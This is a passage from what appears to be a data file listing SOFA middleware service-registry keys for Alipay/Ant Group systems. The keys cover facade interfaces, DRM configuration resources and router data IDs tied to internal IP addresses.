#SOFA_ROUTER","com.alipay.insclaiminvestprod.facade.transport.ability.InvestTransportAbilityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.prodsale.ProdSaleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.rule.InsIopRuleMetaMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_CP_CHARITY_NGO_INFO_SCAN_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custview.facade.InvolvedPartyRoleViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererWhiteUrls,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcardcore.common.service.facade.mpcard.McardCampQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sync.ipublic#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.159.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.gfas:name=com.alipay.gfas.core.config.drm.GfasDrmResource.scheduleDBMaxConnectNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchservbase.biz.service.leads.facade.spi.LeadsProcessSpiFacade:1.0:ts-service-offline-opportunity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.250#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finmodelops.common.service.facade.intdata.api.IntDataServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.securitycore.common.service.facade.merchant.api.MerchantCertificateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.certifymng:name=com.alipay.cif.drm.BizCertifyRuleGreySwitch.needCompare,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.biz.BizQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.200.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.128.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.27.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_ACPARTNER#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_MDM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.oceanbase.obcustomercore.common.service.facade.UCKernelAccessorManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lendpofprod.common.service.facade.loanapi.apply.LoanPersonAdmitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfpcenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.jdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpdcenter.facade.api.BlockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.poscore.SharedataDataSource.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.232.220#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.Arch:name=com.alipay.xts.ldc.cfpcenter.changeMode,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.supergw.service.facade.config.cache.RunningInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.conf.facade.UniQueryConfService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.acbsbcore.common.service.facade.BsbCallerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ordermng.common.service.api.merchant.WhiteListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditkit.facade.service.merchant.FilterToolsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imaspmng.common.service.facade.SopFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CLRFINANCING#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:tbfcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.185.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.gloantrade.common.service.facade.api.repay.RepayApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.conf.AntxConfManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acoffercenter.common.service.facade.offer.OfferRelaManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.cardcenter.facade.NonSensitiveCardInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.sync.FinstrategySwitchConfigDrmImpl.forceCheckSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.poscore.common.service.facade.creditcardfp.PaymentConsultService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.88.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.etetestcore.service.api.kbdelivery.KbdeliveryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP-consume-msgsned#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilecsa.common.service.facade.MenuCommonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.smartant.SmartAntAssetQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.core.service.group.biz.MerchantGroupBizService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bksigncentre.common.service.facade.api.ContractQueryFacade:1.0:bksigncentre_contractQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincorecheck.common.service.facade.bizcheck.BaseLineCacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.default#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.promocenter.common.manage.facade.api.template.SceneTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.130.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.walle.service.facade.api.TestCaseLibraryTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.cardrelation.CardRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.195.164#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.memberprod.common.service.account.StockApplyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.84.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.mif.common.service.facade.MerchantAttachmentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.45.160#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifeprod.common.service.facade.api.deliver.LifeDeliverOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.product.common.service.api.PdConfigOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.prodcenter.common.service.facade.query.api.product.ProductQueryStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membertangram.common.service.facade.analysis.MultiDimAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.zcache.switcher.bankcardTairCache.switcherValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.overseapcard.api.OSPCardtransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpayprod.common.service.facade.FamilyHonorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insbffweb:name=com.alipay.insbffweb.chair.Config.huabeiInstallmentStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pointcore.common.mpoint.facade.MpointFlowinSimpleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.DividendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.service.integration.fintradecenter.FintradeOrderQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.inner.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbpdcenter.common.service.facade.UniteSwitchQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:govbizprodsys@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grsettle.facade.api.settle.ProjectSettleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.BPInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.echox.drm.EchoxSpecialDrm.cleanMockCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.236.180#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finauth.core.service.repository.inst.FaInstContractRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fuelprod.facade.BenefitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frboss.facade.api.PageModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmeta.facade.virtual.VirtualDomainModelManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.bankcardTairCache_dest.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.140.216#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_ALI_HR_MASTERDATA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mremindprod.common.service.facade.recommend.CrowdBucketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.facade.service.robot.RobotDataItemFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cinspfront.common.service.facade.AlTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.settlement.common.service.facade.api.RTSDebitService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:trainRecordDownloadCenterCallBackImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_P_DPC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfundtaskcenter.clear.common.service.facade.BizDomainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.OpenOperatorPermissionQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.221.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone_dest.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.69.243.150#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ideploy.common.service.control.service.OpChangeBatchDeployService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.odpsUser,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.customscenter.ccDS.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:aibenchmark@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csivr.common.service.facade.api.VdnShuntQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundguard.facade.api.safecheck.CheckElementManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue23#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_SMDD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.73.168.157#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_1301_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:servicegoverncenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.hypTair.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbdinningcenter.common.service.facade.dinningflow.DinningFlowServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datacontextlib.service.facade.dataswap.DataSwapConsumeService:1.0:zdatacontext@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifglobal:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S_dchainprod_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.custinsight.common.service.facade.recommend.RecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelrouter.service.facade.ChannelQueryService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfinancial.antchain.cloud.endpoint.facade.ContractDataModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almanalysis.common.service.facade.api.FundPlanCommandFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.analysis.AnalysisLiteProductChangeDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bpaas.ecomerchant.facade.app.AppQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instdatalink.common.service.facade.datalink.ActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.UserLevelPromoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ucdpmng.facade.UcdpCommonContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.game.service.PcreditMarketGameFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.225.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreCzoneTairCache_dest.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.merchant.IndustryPoolService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dchaincustomer.facade.api.member.MemberService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.mrchcommerce.mrchlabcore.common.service.facade.api.template.CategoryTemplateQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA-SCHEDULER-S-S_appxprod_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:FUND_ACCOUNT_TEMPLATE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.138.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudinc:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.FollowManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ternadmin.facade.TernDeployFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.130.193#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.agdsriskdecision.facade.AsyncStrategyCenClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.enterprise.facade.EntBankCardUsageInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custcpt.facade.AccountOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfbill.common.service.facade.api.BillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaocore.service.spi.OpenCardInvokeService:1.0:ofpgrowth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.reverseapply.AssetReverseSupplierApplyRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:publicDomain_finannafccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icfmng.common.service.facade.api.PendingReasonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instasset.common.service.facade.partner.role.PartnerRoleRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.ApiAuthConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.appuser.MerchantAppUserDataImportFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskCatService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.LocalCacheConfigDrm.initTrigger,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:unitradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.api.AccountCancelOperateFacade:1.0:bkfundbuss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorcenter.common.service.trade.facade.AdvisorProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirecenter.common.service.facade.api.SyncConfirmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebTransferInSignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ucdpmng.facade.api.PositionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.playbackmng.playback.api.DataTransformAgentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compmng.service.facade.bxs.BXSAssessFacade:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","_CLIENTSERVICE_TEST_3_1_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.limitcum.service.facade.CumulateManageFacade:1.0:cumulateManageFacade-for-bridge@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgengine.common.facade.service.concept.KgConceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.alipayauth.service.lisa.AlipayAuthPcScanQrCodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.imif.common.service.facade.api.MerchantShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.test.SimpleService-47#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fundmng.common.service.facade.guardian.AccGoldAfterTradeVerifyActionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.slaguard:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.dchain.common.facade.api.comparam.InstQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.zdal.ldc.tair.riskmngTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iprofile.facade.usernet.api.UsernetScientificDataServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.162.207#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:zfcertifycenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.signature.SignatureUtilFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_S_MOBILPAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.routeclient.interfacename:promocenter#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cfpcenter.emc.common.service.facade.api.EmergencyAdjustFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.biz.rpc.facade.ScanBoxFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.library.facade.LibraryQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.pdcore.common.service.clientcache.innerclient.slaver.api.InnerClientSlaverFacade:1.0:algox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_EXTDATASYNC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:lifeexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.outbound.facade.RecordingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payplus.common.service.facade.api.ExecutePlanQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antrecluse.facade.service.bo.ServiceBo:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Servers_TP_O_IDCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitydataservice:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openaccess.common.quickaccess.facade.service.proxy.platform.QuickaccessPlatformService:1.0:${system_name}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gacplatform.facade.api.GacPlatformServiceFacade:1.0:fporgassetfinancing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.admgr.common.service.facade.PortalServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.aegis.AegisMiniAppMngFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.transfer.FundDataTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdiscount.common.service.facade.api.DiscountToolQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.PermissionCompensateManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antforest.common.service.facade.UserEnergyQueryService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accreditcore.common.service.facade.HastenStopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.postmen.spi.MessageSpi:1.0:messagefusion@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.RepayRemindGreyDrm.greyWhiteListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.biztype.BizTypeManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.238.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.mosn.MosnAppInvokeService:1.0:trafficintelbiz@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.corgi.facade.QualityVerifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:fundapplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.MergeService:1.0:scsupport@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.material.ServiceMaterialQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.AnnualPromotionWhiteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mser